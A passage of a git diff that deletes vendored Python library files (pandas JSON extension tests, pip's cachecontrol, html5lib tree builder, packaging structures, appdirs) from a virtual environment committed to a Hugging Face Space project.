dicts.") - def test_equals(self, data, na_value, as_series): - super().test_equals(data, na_value, as_series) - - @pytest.mark.skip("fill-value is interpreted as a dict of values") - def test_fillna_copy_frame(self, data_missing): - super().test_fillna_copy_frame(data_missing) - - def test_equals_same_data_different_object( - self, data, using_copy_on_write, request - ): - if using_copy_on_write: - mark = pytest.mark.xfail(reason="Fails with CoW") - request.node.add_marker(mark) - super().test_equals_same_data_different_object(data) - - -class TestCasting(BaseJSON, base.BaseCastingTests): - @pytest.mark.xfail(reason="failing on np.array(self, dtype=str)") - def test_astype_str(self): - """This currently fails in NumPy on np.array(self, dtype=str) with - - *** ValueError: setting an array element with a sequence - """ - super().test_astype_str() - - -# We intentionally don't run base.BaseSetitemTests because pandas' -# internals has trouble setting sequences of values into scalar positions. 
- - -class TestGroupby(BaseJSON, base.BaseGroupbyTests): - @unhashable - def test_groupby_extension_transform(self): - """ - This currently fails in Series.name.setter, since the - name must be hashable, but the value is a dictionary. - I think this is what we want, i.e. `.name` should be the original - values, and not the values for factorization. - """ - super().test_groupby_extension_transform() - - @unhashable - def test_groupby_extension_apply(self): - """ - This fails in Index._do_unique_check with - - > hash(val) - E TypeError: unhashable type: 'UserDict' with - - I suspect that once we support Index[ExtensionArray], - we'll be able to dispatch unique. - """ - super().test_groupby_extension_apply() - - @unhashable - def test_groupby_extension_agg(self): - """ - This fails when we get to tm.assert_series_equal when left.index - contains dictionaries, which are not hashable. - """ - super().test_groupby_extension_agg() - - @unhashable - def test_groupby_extension_no_sort(self): - """ - This fails when we get to tm.assert_series_equal when left.index - contains dictionaries, which are not hashable. - """ - super().test_groupby_extension_no_sort() - - -class TestArithmeticOps(BaseJSON, base.BaseArithmeticOpsTests): - def test_arith_frame_with_scalar(self, data, all_arithmetic_operators, request): - if len(data[0]) != 1: - mark = pytest.mark.xfail(reason="raises in coercing to Series") - request.node.add_marker(mark) - super().test_arith_frame_with_scalar(data, all_arithmetic_operators) - - -class TestComparisonOps(BaseJSON, base.BaseComparisonOpsTests): - def test_compare_array(self, data, comparison_op, request): - if comparison_op.__name__ in ["eq", "ne"]: - mark = pytest.mark.xfail(reason="Comparison methods not implemented") - request.node.add_marker(mark) - super().test_compare_array(data, comparison_op) - - -class TestPrinting(BaseJSON, base.BasePrintingTests): - pass - - -def custom_assert_series_equal(left, right, *args, **kwargs): - # NumPy doesn't handle an array of equal-length UserDicts. - # The default assert_series_equal eventually does a - # Series.values, which raises. We work around it by - # converting the UserDicts to dicts. - if left.dtype.name == "json": - assert left.dtype == right.dtype - left = pd.Series( - JSONArray(left.values.astype(object)), index=left.index, name=left.name - ) - right = pd.Series( - JSONArray(right.values.astype(object)), - index=right.index, - name=right.name, - ) - tm.assert_series_equal(left, right, *args, **kwargs) - - -def custom_assert_frame_equal(left, right, *args, **kwargs): - obj_type = kwargs.get("obj", "DataFrame") - tm.assert_index_equal( - left.columns, - right.columns, - exact=kwargs.get("check_column_type", "equiv"), - check_names=kwargs.get("check_names", True), - check_exact=kwargs.get("check_exact", False), - check_categorical=kwargs.get("check_categorical", True), - obj=f"{obj_type}.columns", - ) - - jsons = (left.dtypes == "json").index - - for col in jsons: - custom_assert_series_equal(left[col], right[col], *args, **kwargs) - - left = left.drop(columns=jsons) - right = right.drop(columns=jsons) - tm.assert_frame_equal(left, right, *args, **kwargs) - - -def test_custom_asserts(): - # This would always trigger the KeyError from trying to put - # an array of equal-length UserDicts inside an ndarray. 
- data = JSONArray( - [ - collections.UserDict({"a": 1}), - collections.UserDict({"b": 2}), - collections.UserDict({"c": 3}), - ] - ) - a = pd.Series(data) - custom_assert_series_equal(a, a) - custom_assert_frame_equal(a.to_frame(), a.to_frame()) - - b = pd.Series(data.take([0, 0, 1])) - msg = r"Series are different" - with pytest.raises(AssertionError, match=msg): - custom_assert_series_equal(a, b) - - with pytest.raises(AssertionError, match=msg): - custom_assert_frame_equal(a.to_frame(), b.to_frame()) diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pandas/tests/series/__init__.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pandas/tests/series/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pip/_vendor/cachecontrol/__init__.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pip/_vendor/cachecontrol/__init__.py deleted file mode 100644 index 8435d628d206a6587e969b4bdf6d5468af82f191..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pip/_vendor/cachecontrol/__init__.py +++ /dev/null @@ -1,18 +0,0 @@ -# SPDX-FileCopyrightText: 2015 Eric Larson -# -# SPDX-License-Identifier: Apache-2.0 - -"""CacheControl import Interface. - -Make it easy to import from cachecontrol without long namespaces. -""" -__author__ = "Eric Larson" -__email__ = "eric@ionrock.org" -__version__ = "0.12.10" - -from .wrapper import CacheControl -from .adapter import CacheControlAdapter -from .controller import CacheController - -import logging -logging.getLogger(__name__).addHandler(logging.NullHandler()) diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pip/_vendor/html5lib/treebuilders/base.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pip/_vendor/html5lib/treebuilders/base.py deleted file mode 100644 index 965fce29d3b9e01e9e9374a3d6318badeca7e1e1..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pip/_vendor/html5lib/treebuilders/base.py +++ /dev/null @@ -1,417 +0,0 @@ -from __future__ import absolute_import, division, unicode_literals -from pip._vendor.six import text_type - -from ..constants import scopingElements, tableInsertModeElements, namespaces - -# The scope markers are inserted when entering object elements, -# marquees, table cells, and table captions, and are used to prevent formatting -# from "leaking" into tables, object elements, and marquees. 
-Marker = None - -listElementsMap = { - None: (frozenset(scopingElements), False), - "button": (frozenset(scopingElements | {(namespaces["html"], "button")}), False), - "list": (frozenset(scopingElements | {(namespaces["html"], "ol"), - (namespaces["html"], "ul")}), False), - "table": (frozenset([(namespaces["html"], "html"), - (namespaces["html"], "table")]), False), - "select": (frozenset([(namespaces["html"], "optgroup"), - (namespaces["html"], "option")]), True) -} - - -class Node(object): - """Represents an item in the tree""" - def __init__(self, name): - """Creates a Node - - :arg name: The tag name associated with the node - - """ - # The tag name associated with the node - self.name = name - # The parent of the current node (or None for the document node) - self.parent = None - # The value of the current node (applies to text nodes and comments) - self.value = None - # A dict holding name -> value pairs for attributes of the node - self.attributes = {} - # A list of child nodes of the current node. This must include all - # elements but not necessarily other node types. - self.childNodes = [] - # A list of miscellaneous flags that can be set on the node. - self._flags = [] - - def __str__(self): - attributesStr = " ".join(["%s=\"%s\"" % (name, value) - for name, value in - self.attributes.items()]) - if attributesStr: - return "<%s %s>" % (self.name, attributesStr) - else: - return "<%s>" % (self.name) - - def __repr__(self): - return "<%s>" % (self.name) - - def appendChild(self, node): - """Insert node as a child of the current node - - :arg node: the node to insert - - """ - raise NotImplementedError - - def insertText(self, data, insertBefore=None): - """Insert data as text in the current node, positioned before the - start of node insertBefore or to the end of the node's text. - - :arg data: the data to insert - - :arg insertBefore: True if you want to insert the text before the node - and False if you want to insert it after the node - - """ - raise NotImplementedError - - def insertBefore(self, node, refNode): - """Insert node as a child of the current node, before refNode in the - list of child nodes. Raises ValueError if refNode is not a child of - the current node - - :arg node: the node to insert - - :arg refNode: the child node to insert the node before - - """ - raise NotImplementedError - - def removeChild(self, node): - """Remove node from the children of the current node - - :arg node: the child node to remove - - """ - raise NotImplementedError - - def reparentChildren(self, newParent): - """Move all the children of the current node to newParent. - This is needed so that trees that don't store text as nodes move the - text in the correct way - - :arg newParent: the node to move all this node's children to - - """ - # XXX - should this method be made more general? - for child in self.childNodes: - newParent.appendChild(child) - self.childNodes = [] - - def cloneNode(self): - """Return a shallow copy of the current node i.e. 
a node with the same - name and attributes but with no parent or child nodes - """ - raise NotImplementedError - - def hasContent(self): - """Return true if the node has children or text, false otherwise - """ - raise NotImplementedError - - -class ActiveFormattingElements(list): - def append(self, node): - equalCount = 0 - if node != Marker: - for element in self[::-1]: - if element == Marker: - break - if self.nodesEqual(element, node): - equalCount += 1 - if equalCount == 3: - self.remove(element) - break - list.append(self, node) - - def nodesEqual(self, node1, node2): - if not node1.nameTuple == node2.nameTuple: - return False - - if not node1.attributes == node2.attributes: - return False - - return True - - -class TreeBuilder(object): - """Base treebuilder implementation - - * documentClass - the class to use for the bottommost node of a document - * elementClass - the class to use for HTML Elements - * commentClass - the class to use for comments - * doctypeClass - the class to use for doctypes - - """ - # pylint:disable=not-callable - - # Document class - documentClass = None - - # The class to use for creating a node - elementClass = None - - # The class to use for creating comments - commentClass = None - - # The class to use for creating doctypes - doctypeClass = None - - # Fragment class - fragmentClass = None - - def __init__(self, namespaceHTMLElements): - """Create a TreeBuilder - - :arg namespaceHTMLElements: whether or not to namespace HTML elements - - """ - if namespaceHTMLElements: - self.defaultNamespace = "http://www.w3.org/1999/xhtml" - else: - self.defaultNamespace = None - self.reset() - - def reset(self): - self.openElements = [] - self.activeFormattingElements = ActiveFormattingElements() - - # XXX - rename these to headElement, formElement - self.headPointer = None - self.formPointer = None - - self.insertFromTable = False - - self.document = self.documentClass() - - def elementInScope(self, target, variant=None): - - # If we pass a node in we match that. if we pass a string - # match any node with that name - exactNode = hasattr(target, "nameTuple") - if not exactNode: - if isinstance(target, text_type): - target = (namespaces["html"], target) - assert isinstance(target, tuple) - - listElements, invert = listElementsMap[variant] - - for node in reversed(self.openElements): - if exactNode and node == target: - return True - elif not exactNode and node.nameTuple == target: - return True - elif (invert ^ (node.nameTuple in listElements)): - return False - - assert False # We should never reach this point - - def reconstructActiveFormattingElements(self): - # Within this algorithm the order of steps described in the - # specification is not quite the same as the order of steps in the - # code. It should still do the same though. - - # Step 1: stop the algorithm when there's nothing to do. - if not self.activeFormattingElements: - return - - # Step 2 and step 3: we start with the last element. So i is -1. - i = len(self.activeFormattingElements) - 1 - entry = self.activeFormattingElements[i] - if entry == Marker or entry in self.openElements: - return - - # Step 6 - while entry != Marker and entry not in self.openElements: - if i == 0: - # This will be reset to 0 below - i = -1 - break - i -= 1 - # Step 5: let entry be one earlier in the list. 
- entry = self.activeFormattingElements[i] - - while True: - # Step 7 - i += 1 - - # Step 8 - entry = self.activeFormattingElements[i] - clone = entry.cloneNode() # Mainly to get a new copy of the attributes - - # Step 9 - element = self.insertElement({"type": "StartTag", - "name": clone.name, - "namespace": clone.namespace, - "data": clone.attributes}) - - # Step 10 - self.activeFormattingElements[i] = element - - # Step 11 - if element == self.activeFormattingElements[-1]: - break - - def clearActiveFormattingElements(self): - entry = self.activeFormattingElements.pop() - while self.activeFormattingElements and entry != Marker: - entry = self.activeFormattingElements.pop() - - def elementInActiveFormattingElements(self, name): - """Check if an element exists between the end of the active - formatting elements and the last marker. If it does, return it, else - return false""" - - for item in self.activeFormattingElements[::-1]: - # Check for Marker first because if it's a Marker it doesn't have a - # name attribute. - if item == Marker: - break - elif item.name == name: - return item - return False - - def insertRoot(self, token): - element = self.createElement(token) - self.openElements.append(element) - self.document.appendChild(element) - - def insertDoctype(self, token): - name = token["name"] - publicId = token["publicId"] - systemId = token["systemId"] - - doctype = self.doctypeClass(name, publicId, systemId) - self.document.appendChild(doctype) - - def insertComment(self, token, parent=None): - if parent is None: - parent = self.openElements[-1] - parent.appendChild(self.commentClass(token["data"])) - - def createElement(self, token): - """Create an element but don't insert it anywhere""" - name = token["name"] - namespace = token.get("namespace", self.defaultNamespace) - element = self.elementClass(name, namespace) - element.attributes = token["data"] - return element - - def _getInsertFromTable(self): - return self._insertFromTable - - def _setInsertFromTable(self, value): - """Switch the function used to insert an element from the - normal one to the misnested table one and back again""" - self._insertFromTable = value - if value: - self.insertElement = self.insertElementTable - else: - self.insertElement = self.insertElementNormal - - insertFromTable = property(_getInsertFromTable, _setInsertFromTable) - - def insertElementNormal(self, token): - name = token["name"] - assert isinstance(name, text_type), "Element %s not unicode" % name - namespace = token.get("namespace", self.defaultNamespace) - element = self.elementClass(name, namespace) - element.attributes = token["data"] - self.openElements[-1].appendChild(element) - self.openElements.append(element) - return element - - def insertElementTable(self, token): - """Create an element and insert it into the tree""" - element = self.createElement(token) - if self.openElements[-1].name not in tableInsertModeElements: - return self.insertElementNormal(token) - else: - # We should be in the InTable mode. 
This means we want to do - # special magic element rearranging - parent, insertBefore = self.getTableMisnestedNodePosition() - if insertBefore is None: - parent.appendChild(element) - else: - parent.insertBefore(element, insertBefore) - self.openElements.append(element) - return element - - def insertText(self, data, parent=None): - """Insert text data.""" - if parent is None: - parent = self.openElements[-1] - - if (not self.insertFromTable or (self.insertFromTable and - self.openElements[-1].name - not in tableInsertModeElements)): - parent.insertText(data) - else: - # We should be in the InTable mode. This means we want to do - # special magic element rearranging - parent, insertBefore = self.getTableMisnestedNodePosition() - parent.insertText(data, insertBefore) - - def getTableMisnestedNodePosition(self): - """Get the foster parent element, and sibling to insert before - (or None) when inserting a misnested table node""" - # The foster parent element is the one which comes before the most - # recently opened table element - # XXX - this is really inelegant - lastTable = None - fosterParent = None - insertBefore = None - for elm in self.openElements[::-1]: - if elm.name == "table": - lastTable = elm - break - if lastTable: - # XXX - we should really check that this parent is actually a - # node here - if lastTable.parent: - fosterParent = lastTable.parent - insertBefore = lastTable - else: - fosterParent = self.openElements[ - self.openElements.index(lastTable) - 1] - else: - fosterParent = self.openElements[0] - return fosterParent, insertBefore - - def generateImpliedEndTags(self, exclude=None): - name = self.openElements[-1].name - # XXX td, th and tr are not actually needed - if (name in frozenset(("dd", "dt", "li", "option", "optgroup", "p", "rp", "rt")) and - name != exclude): - self.openElements.pop() - # XXX This is not entirely what the specification says. We should - # investigate it more closely. - self.generateImpliedEndTags(exclude) - - def getDocument(self): - """Return the final tree""" - return self.document - - def getFragment(self): - """Return the final fragment""" - # assert self.innerHTML - fragment = self.fragmentClass() - self.openElements[0].reparentChildren(fragment) - return fragment - - def testSerializer(self, node): - """Serialize the subtree of node in the format required by unit tests - - :arg node: the node from which to start serializing - - """ - raise NotImplementedError diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pip/_vendor/packaging/_structures.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pip/_vendor/packaging/_structures.py deleted file mode 100644 index 90a6465f9682c886363eea5327dac64bf623a6ff..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pip/_vendor/packaging/_structures.py +++ /dev/null @@ -1,61 +0,0 @@ -# This file is dual licensed under the terms of the Apache License, Version -# 2.0, and the BSD License. See the LICENSE file in the root of this repository -# for complete details. 
- - -class InfinityType: - def __repr__(self) -> str: - return "Infinity" - - def __hash__(self) -> int: - return hash(repr(self)) - - def __lt__(self, other: object) -> bool: - return False - - def __le__(self, other: object) -> bool: - return False - - def __eq__(self, other: object) -> bool: - return isinstance(other, self.__class__) - - def __gt__(self, other: object) -> bool: - return True - - def __ge__(self, other: object) -> bool: - return True - - def __neg__(self: object) -> "NegativeInfinityType": - return NegativeInfinity - - -Infinity = InfinityType() - - -class NegativeInfinityType: - def __repr__(self) -> str: - return "-Infinity" - - def __hash__(self) -> int: - return hash(repr(self)) - - def __lt__(self, other: object) -> bool: - return True - - def __le__(self, other: object) -> bool: - return True - - def __eq__(self, other: object) -> bool: - return isinstance(other, self.__class__) - - def __gt__(self, other: object) -> bool: - return False - - def __ge__(self, other: object) -> bool: - return False - - def __neg__(self: object) -> InfinityType: - return Infinity - - -NegativeInfinity = NegativeInfinityType() diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pkg_resources/_vendor/appdirs.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pkg_resources/_vendor/appdirs.py deleted file mode 100644 index ae67001af8b661373edeee2eb327b9f63e630d62..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pkg_resources/_vendor/appdirs.py +++ /dev/null @@ -1,608 +0,0 @@ -#!/usr/bin/env python -# -*- coding: utf-8 -*- -# Copyright (c) 2005-2010 ActiveState Software Inc. -# Copyright (c) 2013 Eddy Petrișor - -"""Utilities for determining application-specific dirs. - -See for details and usage. -""" -# Dev Notes: -# - MSDN on where to store app data files: -# http://support.microsoft.com/default.aspx?scid=kb;en-us;310294#XSLTH3194121123120121120120 -# - Mac OS X: http://developer.apple.com/documentation/MacOSX/Conceptual/BPFileSystem/index.html -# - XDG spec for Un*x: http://standards.freedesktop.org/basedir-spec/basedir-spec-latest.html - -__version_info__ = (1, 4, 3) -__version__ = '.'.join(map(str, __version_info__)) - - -import sys -import os - -PY3 = sys.version_info[0] == 3 - -if PY3: - unicode = str - -if sys.platform.startswith('java'): - import platform - os_name = platform.java_ver()[3][0] - if os_name.startswith('Windows'): # "Windows XP", "Windows 7", etc. - system = 'win32' - elif os_name.startswith('Mac'): # "Mac OS X", etc. - system = 'darwin' - else: # "Linux", "SunOS", "FreeBSD", etc. - # Setting this to "linux2" is not ideal, but only Windows or Mac - # are actually checked for and the rest of the module expects - # *sys.platform* style strings. - system = 'linux2' -else: - system = sys.platform - - - -def user_data_dir(appname=None, appauthor=None, version=None, roaming=False): - r"""Return full path to the user-specific data dir for this application. - - "appname" is the name of application. - If None, just the system directory is returned. - "appauthor" (only used on Windows) is the name of the - appauthor or distributing body for this application. Typically - it is the owning company name. This falls back to appname. You may - pass False to disable it. - "version" is an optional version path element to append to the - path. You might want to use this if you want multiple versions - of your app to be able to run independently. 
If used, this - would typically be ".". - Only applied when appname is present. - "roaming" (boolean, default False) can be set True to use the Windows - roaming appdata directory. That means that for users on a Windows - network setup for roaming profiles, this user data will be - sync'd on login. See - - for a discussion of issues. - - Typical user data directories are: - Mac OS X: ~/Library/Application Support/ - Unix: ~/.local/share/ # or in $XDG_DATA_HOME, if defined - Win XP (not roaming): C:\Documents and Settings\\Application Data\\ - Win XP (roaming): C:\Documents and Settings\\Local Settings\Application Data\\ - Win 7 (not roaming): C:\Users\\AppData\Local\\ - Win 7 (roaming): C:\Users\\AppData\Roaming\\ - - For Unix, we follow the XDG spec and support $XDG_DATA_HOME. - That means, by default "~/.local/share/". - """ - if system == "win32": - if appauthor is None: - appauthor = appname - const = roaming and "CSIDL_APPDATA" or "CSIDL_LOCAL_APPDATA" - path = os.path.normpath(_get_win_folder(const)) - if appname: - if appauthor is not False: - path = os.path.join(path, appauthor, appname) - else: - path = os.path.join(path, appname) - elif system == 'darwin': - path = os.path.expanduser('~/Library/Application Support/') - if appname: - path = os.path.join(path, appname) - else: - path = os.getenv('XDG_DATA_HOME', os.path.expanduser("~/.local/share")) - if appname: - path = os.path.join(path, appname) - if appname and version: - path = os.path.join(path, version) - return path - - -def site_data_dir(appname=None, appauthor=None, version=None, multipath=False): - r"""Return full path to the user-shared data dir for this application. - - "appname" is the name of application. - If None, just the system directory is returned. - "appauthor" (only used on Windows) is the name of the - appauthor or distributing body for this application. Typically - it is the owning company name. This falls back to appname. You may - pass False to disable it. - "version" is an optional version path element to append to the - path. You might want to use this if you want multiple versions - of your app to be able to run independently. If used, this - would typically be ".". - Only applied when appname is present. - "multipath" is an optional parameter only applicable to *nix - which indicates that the entire list of data dirs should be - returned. By default, the first item from XDG_DATA_DIRS is - returned, or '/usr/local/share/', - if XDG_DATA_DIRS is not set - - Typical site data directories are: - Mac OS X: /Library/Application Support/ - Unix: /usr/local/share/ or /usr/share/ - Win XP: C:\Documents and Settings\All Users\Application Data\\ - Vista: (Fail! "C:\ProgramData" is a hidden *system* directory on Vista.) - Win 7: C:\ProgramData\\ # Hidden, but writeable on Win 7. - - For Unix, this is using the $XDG_DATA_DIRS[0] default. - - WARNING: Do not use this on Windows. See the Vista-Fail note above for why. 
- """ - if system == "win32": - if appauthor is None: - appauthor = appname - path = os.path.normpath(_get_win_folder("CSIDL_COMMON_APPDATA")) - if appname: - if appauthor is not False: - path = os.path.join(path, appauthor, appname) - else: - path = os.path.join(path, appname) - elif system == 'darwin': - path = os.path.expanduser('/Library/Application Support') - if appname: - path = os.path.join(path, appname) - else: - # XDG default for $XDG_DATA_DIRS - # only first, if multipath is False - path = os.getenv('XDG_DATA_DIRS', - os.pathsep.join(['/usr/local/share', '/usr/share'])) - pathlist = [os.path.expanduser(x.rstrip(os.sep)) for x in path.split(os.pathsep)] - if appname: - if version: - appname = os.path.join(appname, version) - pathlist = [os.sep.join([x, appname]) for x in pathlist] - - if multipath: - path = os.pathsep.join(pathlist) - else: - path = pathlist[0] - return path - - if appname and version: - path = os.path.join(path, version) - return path - - -def user_config_dir(appname=None, appauthor=None, version=None, roaming=False): - r"""Return full path to the user-specific config dir for this application. - - "appname" is the name of application. - If None, just the system directory is returned. - "appauthor" (only used on Windows) is the name of the - appauthor or distributing body for this application. Typically - it is the owning company name. This falls back to appname. You may - pass False to disable it. - "version" is an optional version path element to append to the - path. You might want to use this if you want multiple versions - of your app to be able to run independently. If used, this - would typically be ".". - Only applied when appname is present. - "roaming" (boolean, default False) can be set True to use the Windows - roaming appdata directory. That means that for users on a Windows - network setup for roaming profiles, this user data will be - sync'd on login. See - - for a discussion of issues. - - Typical user config directories are: - Mac OS X: same as user_data_dir - Unix: ~/.config/ # or in $XDG_CONFIG_HOME, if defined - Win *: same as user_data_dir - - For Unix, we follow the XDG spec and support $XDG_CONFIG_HOME. - That means, by default "~/.config/". - """ - if system in ["win32", "darwin"]: - path = user_data_dir(appname, appauthor, None, roaming) - else: - path = os.getenv('XDG_CONFIG_HOME', os.path.expanduser("~/.config")) - if appname: - path = os.path.join(path, appname) - if appname and version: - path = os.path.join(path, version) - return path - - -def site_config_dir(appname=None, appauthor=None, version=None, multipath=False): - r"""Return full path to the user-shared data dir for this application. - - "appname" is the name of application. - If None, just the system directory is returned. - "appauthor" (only used on Windows) is the name of the - appauthor or distributing body for this application. Typically - it is the owning company name. This falls back to appname. You may - pass False to disable it. - "version" is an optional version path element to append to the - path. You might want to use this if you want multiple versions - of your app to be able to run independently. If used, this - would typically be ".". - Only applied when appname is present. - "multipath" is an optional parameter only applicable to *nix - which indicates that the entire list of config dirs should be - returned. 
By default, the first item from XDG_CONFIG_DIRS is - returned, or '/etc/xdg/', if XDG_CONFIG_DIRS is not set - - Typical site config directories are: - Mac OS X: same as site_data_dir - Unix: /etc/xdg/ or $XDG_CONFIG_DIRS[i]/ for each value in - $XDG_CONFIG_DIRS - Win *: same as site_data_dir - Vista: (Fail! "C:\ProgramData" is a hidden *system* directory on Vista.) - - For Unix, this is using the $XDG_CONFIG_DIRS[0] default, if multipath=False - - WARNING: Do not use this on Windows. See the Vista-Fail note above for why. - """ - if system in ["win32", "darwin"]: - path = site_data_dir(appname, appauthor) - if appname and version: - path = os.path.join(path, version) - else: - # XDG default for $XDG_CONFIG_DIRS - # only first, if multipath is False - path = os.getenv('XDG_CONFIG_DIRS', '/etc/xdg') - pathlist = [os.path.expanduser(x.rstrip(os.sep)) for x in path.split(os.pathsep)] - if appname: - if version: - appname = os.path.join(appname, version) - pathlist = [os.sep.join([x, appname]) for x in pathlist] - - if multipath: - path = os.pathsep.join(pathlist) - else: - path = pathlist[0] - return path - - -def user_cache_dir(appname=None, appauthor=None, version=None, opinion=True): - r"""Return full path to the user-specific cache dir for this application. - - "appname" is the name of application. - If None, just the system directory is returned. - "appauthor" (only used on Windows) is the name of the - appauthor or distributing body for this application. Typically - it is the owning company name. This falls back to appname. You may - pass False to disable it. - "version" is an optional version path element to append to the - path. You might want to use this if you want multiple versions - of your app to be able to run independently. If used, this - would typically be ".". - Only applied when appname is present. - "opinion" (boolean) can be False to disable the appending of - "Cache" to the base app data dir for Windows. See - discussion below. - - Typical user cache directories are: - Mac OS X: ~/Library/Caches/ - Unix: ~/.cache/ (XDG default) - Win XP: C:\Documents and Settings\\Local Settings\Application Data\\\Cache - Vista: C:\Users\\AppData\Local\\\Cache - - On Windows the only suggestion in the MSDN docs is that local settings go in - the `CSIDL_LOCAL_APPDATA` directory. This is identical to the non-roaming - app data dir (the default returned by `user_data_dir` above). Apps typically - put cache data somewhere *under* the given dir here. Some examples: - ...\Mozilla\Firefox\Profiles\\Cache - ...\Acme\SuperApp\Cache\1.0 - OPINION: This function appends "Cache" to the `CSIDL_LOCAL_APPDATA` value. - This can be disabled with the `opinion=False` option. - """ - if system == "win32": - if appauthor is None: - appauthor = appname - path = os.path.normpath(_get_win_folder("CSIDL_LOCAL_APPDATA")) - if appname: - if appauthor is not False: - path = os.path.join(path, appauthor, appname) - else: - path = os.path.join(path, appname) - if opinion: - path = os.path.join(path, "Cache") - elif system == 'darwin': - path = os.path.expanduser('~/Library/Caches') - if appname: - path = os.path.join(path, appname) - else: - path = os.getenv('XDG_CACHE_HOME', os.path.expanduser('~/.cache')) - if appname: - path = os.path.join(path, appname) - if appname and version: - path = os.path.join(path, version) - return path - - -def user_state_dir(appname=None, appauthor=None, version=None, roaming=False): - r"""Return full path to the user-specific state dir for this application. 
- - "appname" is the name of application. - If None, just the system directory is returned. - "appauthor" (only used on Windows) is the name of the - appauthor or distributing body for this application. Typically - it is the owning company name. This falls back to appname. You may - pass False to disable it. - "version" is an optional version path element to append to the - path. You might want to use this if you want multiple versions - of your app to be able to run independently. If used, this - would typically be ".". - Only applied when appname is present. - "roaming" (boolean, default False) can be set True to use the Windows - roaming appdata directory. That means that for users on a Windows - network setup for roaming profiles, this user data will be - sync'd on login. See - - for a discussion of issues. - - Typical user state directories are: - Mac OS X: same as user_data_dir - Unix: ~/.local/state/ # or in $XDG_STATE_HOME, if defined - Win *: same as user_data_dir - - For Unix, we follow this Debian proposal - to extend the XDG spec and support $XDG_STATE_HOME. - - That means, by default "~/.local/state/". - """ - if system in ["win32", "darwin"]: - path = user_data_dir(appname, appauthor, None, roaming) - else: - path = os.getenv('XDG_STATE_HOME', os.path.expanduser("~/.local/state")) - if appname: - path = os.path.join(path, appname) - if appname and version: - path = os.path.join(path, version) - return path - - -def user_log_dir(appname=None, appauthor=None, version=None, opinion=True): - r"""Return full path to the user-specific log dir for this application. - - "appname" is the name of application. - If None, just the system directory is returned. - "appauthor" (only used on Windows) is the name of the - appauthor or distributing body for this application. Typically - it is the owning company name. This falls back to appname. You may - pass False to disable it. - "version" is an optional version path element to append to the - path. You might want to use this if you want multiple versions - of your app to be able to run independently. If used, this - would typically be ".". - Only applied when appname is present. - "opinion" (boolean) can be False to disable the appending of - "Logs" to the base app data dir for Windows, and "log" to the - base cache dir for Unix. See discussion below. - - Typical user log directories are: - Mac OS X: ~/Library/Logs/ - Unix: ~/.cache//log # or under $XDG_CACHE_HOME if defined - Win XP: C:\Documents and Settings\\Local Settings\Application Data\\\Logs - Vista: C:\Users\\AppData\Local\\\Logs - - On Windows the only suggestion in the MSDN docs is that local settings - go in the `CSIDL_LOCAL_APPDATA` directory. (Note: I'm interested in - examples of what some windows apps use for a logs dir.) - - OPINION: This function appends "Logs" to the `CSIDL_LOCAL_APPDATA` - value for Windows and appends "log" to the user cache dir for Unix. - This can be disabled with the `opinion=False` option. 
- """ - if system == "darwin": - path = os.path.join( - os.path.expanduser('~/Library/Logs'), - appname) - elif system == "win32": - path = user_data_dir(appname, appauthor, version) - version = False - if opinion: - path = os.path.join(path, "Logs") - else: - path = user_cache_dir(appname, appauthor, version) - version = False - if opinion: - path = os.path.join(path, "log") - if appname and version: - path = os.path.join(path, version) - return path - - -class AppDirs(object): - """Convenience wrapper for getting application dirs.""" - def __init__(self, appname=None, appauthor=None, version=None, - roaming=False, multipath=False): - self.appname = appname - self.appauthor = appauthor - self.version = version - self.roaming = roaming - self.multipath = multipath - - @property - def user_data_dir(self): - return user_data_dir(self.appname, self.appauthor, - version=self.version, roaming=self.roaming) - - @property - def site_data_dir(self): - return site_data_dir(self.appname, self.appauthor, - version=self.version, multipath=self.multipath) - - @property - def user_config_dir(self): - return user_config_dir(self.appname, self.appauthor, - version=self.version, roaming=self.roaming) - - @property - def site_config_dir(self): - return site_config_dir(self.appname, self.appauthor, - version=self.version, multipath=self.multipath) - - @property - def user_cache_dir(self): - return user_cache_dir(self.appname, self.appauthor, - version=self.version) - - @property - def user_state_dir(self): - return user_state_dir(self.appname, self.appauthor, - version=self.version) - - @property - def user_log_dir(self): - return user_log_dir(self.appname, self.appauthor, - version=self.version) - - -#---- internal support stuff - -def _get_win_folder_from_registry(csidl_name): - """This is a fallback technique at best. I'm not sure if using the - registry for this guarantees us the correct answer for all CSIDL_* - names. - """ - if PY3: - import winreg as _winreg - else: - import _winreg - - shell_folder_name = { - "CSIDL_APPDATA": "AppData", - "CSIDL_COMMON_APPDATA": "Common AppData", - "CSIDL_LOCAL_APPDATA": "Local AppData", - }[csidl_name] - - key = _winreg.OpenKey( - _winreg.HKEY_CURRENT_USER, - r"Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" - ) - dir, type = _winreg.QueryValueEx(key, shell_folder_name) - return dir - - -def _get_win_folder_with_pywin32(csidl_name): - from win32com.shell import shellcon, shell - dir = shell.SHGetFolderPath(0, getattr(shellcon, csidl_name), 0, 0) - # Try to make this a unicode path because SHGetFolderPath does - # not return unicode strings when there is unicode data in the - # path. - try: - dir = unicode(dir) - - # Downgrade to short path name if have highbit chars. See - # . - has_high_char = False - for c in dir: - if ord(c) > 255: - has_high_char = True - break - if has_high_char: - try: - import win32api - dir = win32api.GetShortPathName(dir) - except ImportError: - pass - except UnicodeError: - pass - return dir - - -def _get_win_folder_with_ctypes(csidl_name): - import ctypes - - csidl_const = { - "CSIDL_APPDATA": 26, 